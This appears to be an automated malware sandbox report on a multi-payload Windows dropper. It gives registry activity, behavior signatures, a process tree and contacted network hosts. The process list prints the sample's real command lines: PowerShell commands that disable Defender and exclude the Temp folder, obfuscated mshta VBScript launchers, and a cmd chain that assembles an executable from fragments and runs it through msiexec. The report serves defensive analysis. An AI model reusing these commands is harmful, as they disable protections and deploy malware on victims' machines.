Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0961d5d40c7b937c7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed098e48a54663552b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0937c2dc68a2496.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed096e68af113.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2084 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2084 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2084 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2084 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2084 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2084 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2084 wrote to memory of 1728 N/A C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1728 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe
PID 1728 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe
PID 1728 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe
PID 1728 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe
PID 1728 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe
PID 1728 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe
PID 1728 wrote to memory of 2896 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe
PID 2896 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2144 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 1256 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 980 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 1572 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2288 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe
PID 2288 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe
PID 2288 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe
PID 2288 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe
PID 2896 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2896 wrote to memory of 836 N/A C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe

"C:\Users\Admin\AppData\Local\Temp\1ad787b5aa241bdde87b30d49ad286d75e23367b833a7d7e97769ca81ac5ae62.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09a48dab921a3bda7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09e3a07534aa.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed094d15aaa9a48.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed096e68af113.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a48dab921a3bda7.exe

Wed09a48dab921a3bda7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed098e48a54663552b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09c36f786070b6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0911cd5800a45.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09a6fb1d0dd846.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0961d5d40c7b937c7.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0937c2dc68a2496.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0988d1c2bd9a37.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed09f3b13c770637f.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed094d15aaa9a48.exe

Wed094d15aaa9a48.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe

Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0937c2dc68a2496.exe

Wed0937c2dc68a2496.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe

Wed09a6fb1d0dd846.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe

Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed096e68af113.exe

Wed096e68af113.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed098e48a54663552b.exe

Wed098e48a54663552b.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe

Wed09e3a07534aa.exe

C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp

"C:\Users\Admin\AppData\Local\Temp\is-H1790.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$70190,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe"

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe

Wed0911cd5800a45.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 900 -s 272

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0961d5d40c7b937c7.exe

Wed0961d5d40c7b937c7.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0988d1c2bd9a37.exe

Wed0988d1c2bd9a37.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe

"C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed0911cd5800a45.exe" ) do taskkill /f -IM "%~nXN"

C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp

"C:\Users\Admin\AppData\Local\Temp\is-229DG.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$80190,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09a6fb1d0dd846.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE

..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA

C:\Windows\SysWOW64\taskkill.exe

taskkill /f -IM "Wed0911cd5800a45.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS0C687BB6\Wed09e3a07534aa.exe

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct ( "wSCRIPT.SHEll" ). RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W " , 0 , True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81 &CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eChO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"

C:\Windows\SysWOW64\msiexec.exe

msiexec /y ..\_enU.W

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 464

Network

Country Destination Domain Proto
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 sayanu.xyz udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
N/A 127.0.0.1:49275 tcp
N/A 127.0.0.1:49277 tcp
US 8.8.8.8:53 cdn.discordapp.com udp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 niemannbest.me udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 propanla.com udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
